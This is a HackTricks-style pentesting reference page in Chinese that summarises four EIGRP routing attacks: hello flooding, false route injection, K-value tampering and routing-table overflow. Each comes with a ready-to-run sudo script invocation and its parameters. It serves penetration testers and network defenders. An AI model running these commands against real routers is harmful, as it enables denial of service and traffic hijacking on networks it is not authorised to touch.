EIGRP Attacks
Last updated
Last updated
学习和实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)
这是在 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 中曝光的攻击摘要。请查看以获取更多信息。
目标:通过向路由器发送 EIGRP hello 数据包来过载路由器 CPU,可能导致拒绝服务 (DoS) 攻击。
工具:helloflooding.py 脚本。
执行: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
参数:
--interface
:指定网络接口,例如 eth0
。
--as
:定义 EIGRP 自治系统编号,例如 1
。
--subnet
:设置子网位置,例如 10.10.100.0/24
。
目标:通过注入虚假路由来干扰网络流量,导致流量被引导到一个不存在的目的地。
工具:routeinject.py 脚本。
执行: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
参数:
--interface
:指定攻击者的系统接口。
--as
:定义 EIGRP AS 编号。
--src
:设置攻击者的 IP 地址。
--dst
:设置目标子网 IP。
--prefix
:定义目标子网 IP 的掩码。
目标:通过注入更改的 K 值在 EIGRP 域内创建持续的中断和重新连接,最终导致 DoS 攻击。
工具:relationshipnightmare.py 脚本。
执行: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
参数:
--interface
:指定网络接口。
--as
:定义 EIGRP AS 编号。
--src
:设置合法路由器的 IP 地址。
目标:通过向路由表中填充大量虚假路由来加重路由器的 CPU 和 RAM 负担。
工具:routingtableoverflow.py 脚本。
执行: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
参数:
--interface
:指定网络接口。
--as
:定义 EIGRP AS 编号。
--src
:设置攻击者的 IP 地址。
学习和实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)